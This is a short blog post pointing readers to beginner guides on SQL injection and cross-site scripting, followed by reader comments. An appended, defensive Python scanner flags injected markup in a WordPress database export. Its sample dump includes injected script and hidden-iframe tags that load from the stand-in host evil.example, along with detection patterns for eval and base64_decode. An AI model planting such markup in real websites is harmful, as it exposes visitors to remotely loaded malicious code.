Beginner's Guides to SQL Injection and Cross-Site Scripting Attacks

I'm not in a position where I have to worry too much about security, but I often hear about vulnerabilities that we protect ourselves against. I just ask an intelligent system architect and he says, "Yes, we're covered," and then the security audit comes back clean again.

There are, however, two security "hacks" or vulnerabilities that you read a lot about on the internet these days: SQL Injection and Cross-Site Scripting. I was aware of both and had read quite a few "technical" bulletins about them, but because I wasn't a real programmer, I would usually wait for security updates, or just make sure the right people were aware of them, and move on.

These two vulnerabilities are things everyone should know about, even the marketer. Simply putting a web form on your website can expose your system to some really bad things.

Brandon Wood has done an excellent job writing Beginner's Guides on both topics that even you or I can understand:

  • SQL Injection
  • Cross-Site Scripting

5 Comments

  1.

    Wow, thanks for the post Doug. I feel honored… 🙂

    The problem you describe of not really knowing how to spot these types of vulnerabilities is the biggest problem that I see. If I show a programmer that doesn’t know a thing about security a piece of code and ask them if it’s secure, of course they are going to say that it’s secure – they don’t know what they’re looking for!

    The real key here is educating our developers on what to look for, and how to fix it. That was the purpose behind my two articles.

  2.

    Might not be the right place but came to notify a serious thing.

    PS: I would like to notify you about a major risk in WordPress that I was able to find. It's a major hack in WordPress with a risk of 7/10. I am not advertising, but do look at my post html-injection-and-being-hacked. Please do notify other bloggers about this. I had a talk with Matt (WordPress) over email about it.

  5.

    WordPress MySQL offline scanner?

    Is there a tool available that can scan an offline WordPress MySQL table exported from phpMyAdmin?

    We have a WordPress MySQL database that appears to have had a SQL injection.
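Comment 5 asks about checking an exported WordPress database for signs of injection. As an added example, not from the post or any of its commenters, here is a small Python scanner that walks the INSERT rows of a phpMyAdmin SQL export and flags rows whose stored content carries markup that should not be there; the dump fragment, the table rows and the host name evil.example are constructed for the example.

```python
import re

# Constructed fragment of a phpMyAdmin SQL export (not a real dump); row 2 of
# wp_posts and row 1 of wp_options carry injected markup, the rest is benign.
SAMPLE_DUMP = r"""
INSERT INTO `wp_posts` (`ID`, `post_title`, `post_content`) VALUES
(1, 'Hello world', 'Welcome to WordPress (first post).'),
(2, 'About', 'About us.<script src=\"http://evil.example/x.js\"></script>'),
(3, 'Contact', 'Email us at info@example.com');
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`) VALUES
(1, 'widget_text', '<iframe src=\"http://evil.example/\" width=0></iframe>');
"""
# Markup that rarely belongs in stored post or option content.
SUSPICIOUS = [re.compile(p, re.I) for p in
              (r"<script\b", r"<iframe\b", r"\beval\s*\(", r"base64_decode\s*\(")]

def parse_inserts(dump):
    """Yield (table, row_number, row_text) for every row of every INSERT, walking
    the text so quotes, backslash escapes, parentheses and ';' inside values
    (all common in injected JavaScript) do not break row boundaries."""
    for m in re.finditer(r"INSERT INTO `(\w+)`.*?VALUES", dump, re.S):
        table, i, depth, n, in_str, buf = m.group(1), m.end(), 0, 0, False, []
        while i < len(dump):
            c = dump[i]
            if in_str:                        # inside a '...' literal
                buf.append(c)
                if c == "\\": buf.append(dump[i + 1]); i += 1   # keep escaped char
                elif c == "'": in_str = False
            elif c == ";" and depth == 0:     # end of this INSERT statement
                break
            elif c == "'":
                in_str = True; buf.append(c)
            elif c == "(":
                depth += 1
                if depth > 1: buf.append(c)   # e.g. NOW() inside a row
            elif c == ")":
                depth -= 1
                if depth == 0: n += 1; yield table, n, "".join(buf); buf = []
                else: buf.append(c)
            elif depth > 0:
                buf.append(c)
            i += 1

def scan_dump(dump):
    """Return [(table, row_number, pattern)] for rows holding suspicious markup."""
    return [(t, n, p.pattern) for t, n, row in parse_inserts(dump)
            for p in SUSPICIOUS if p.search(row)]
```

Run it against a real export and review each flagged (table, row) by hand; the pattern list is a starting point, not a complete signature set.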
